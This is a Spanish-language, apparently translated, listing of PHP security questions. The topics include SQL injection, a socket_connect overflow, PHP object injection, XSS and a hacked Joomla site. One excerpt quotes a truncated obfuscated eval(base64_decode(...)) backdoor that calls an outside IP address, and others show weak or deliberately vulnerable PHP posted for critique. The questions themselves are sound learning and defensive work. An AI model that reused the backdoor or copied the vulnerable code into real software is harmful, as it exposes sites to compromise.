Las mejores php Tus preguntas

2

respuestas

¿Mi código utiliza mysqli_real_escape_string y quotes100% seguro contra Inyección de SQL?

Mi código es: SELECT * FROM tlb_members WHERE username="{mysqli_real_escape_string($_GET['test'])}" Estoy buscando y algunas personas dijeron que usar comillas en sentencias de SQL es seguro. ¿Es esto cierto?

hecha 07.03.2016 - 06:14

2

respuestas

PHP socket_connect Desbordamiento de pila

En la descripción de la vulnerabilidad: Stack-based buffer overflow in the socket_connect function in ext/sockets/sockets.c in PHP 5.3.3 through 5.3.6 might allow context-dependent attackers to execute arbitrary code via a long pathname for...

hecha 03.04.2012 - 22:08

4

respuestas

Inyección de SQL con pase MD5

Quiero saber, si en mi formulario de inicio de sesión hay alguna inyección SQL posible. Si existe, ¿cómo podría ser la entrada del formulario web del exploit? Envío nombre de usuario y contraseña por formulario html (POST). El código de la funci...

hecha 13.09.2013 - 14:59

2

respuestas

¿Cómo crear un sistema de inicio de sesión seguro con cookies? [cerrado]

Para mi educación personal, estoy tratando de crear un sistema de inicio de sesión seguro utilizando cookies. He leído muchos artículos y preguntas de desbordamiento de pila sobre cómo lograrlo, pero no pude encontrar nada útil. Todo el mundo su...

hecha 09.12.2015 - 04:45

1

respuesta

datos de prueba cifrados en PHP y JS

Estoy desarrollando una prueba con la que puedes ganar algunos premios geniales. Por lo tanto, me temo que alguien podría intentar piratearlo / manipularlo. Todos los participantes deben iniciar sesión y el sitio web toma 15 preguntas de la b...

hecha 23.01.2015 - 10:59

5

respuestas

sitio puerta trasera y eval ()

Estoy ejecutando un sitio Joomla 1.7 que fue hackeado hoy. Debajo de la secuencia de comandos hizo el hack. eval((base64_decode("DQoNCnByaW50IEBmaWxlX2dldF9jb250ZW50cygnaHR0cDovLzkzLjExNS44Ni4xNjgvaGxpbmtzL2xpbmtzLnBocD91YT0nIC4gQHVybGVuY29kZS...

hecha 21.02.2013 - 09:54

2

respuestas

SQL Injection no funciona cuando creo que debería

Estoy tratando de aprender sobre inyecciones de PHP y SQL, por lo que he creado un formulario de inicio de sesión donde los usuarios introducen su nombre de usuario y contraseña y hacen clic en el botón Iniciar sesión. Más adelante, en el servid...

hecha 07.07.2016 - 17:12

2

respuestas

¿Por qué funciona este exploit de inyección de objetos PHP?

Recientemente he creado un código PHP vulnerable a la inyección de objetos. Aquí está el código de mi archivo one.php donde deserializo el parámetro data : <?php class utkarsh { public $logfile = "delete.txt"; public...

hecha 28.12.2017 - 11:51

5

respuestas

Autenticar usuario sin saber su contraseña

Estoy trabajando en un proyecto donde cada usuario tendrá un par de claves RSA público / privado. Los usuarios podrán enviarse mensajes cifrados entre sí utilizando la clave pública de cada usuario de destino para que solo los usuarios de destin...

hecha 04.12.2013 - 16:21

4

respuestas

¿Cómo usar la vulnerabilidad XSS para leer el archivo en el servidor?

¿Puedo usar una vulnerabilidad XSS para leer archivos en el servidor inyectando código PHP en la página? Ej .: Use document.write para inyectar el código PHP que lee el archivo.

hecha 14.07.2016 - 06:19

Preguntas con etiqueta 'php'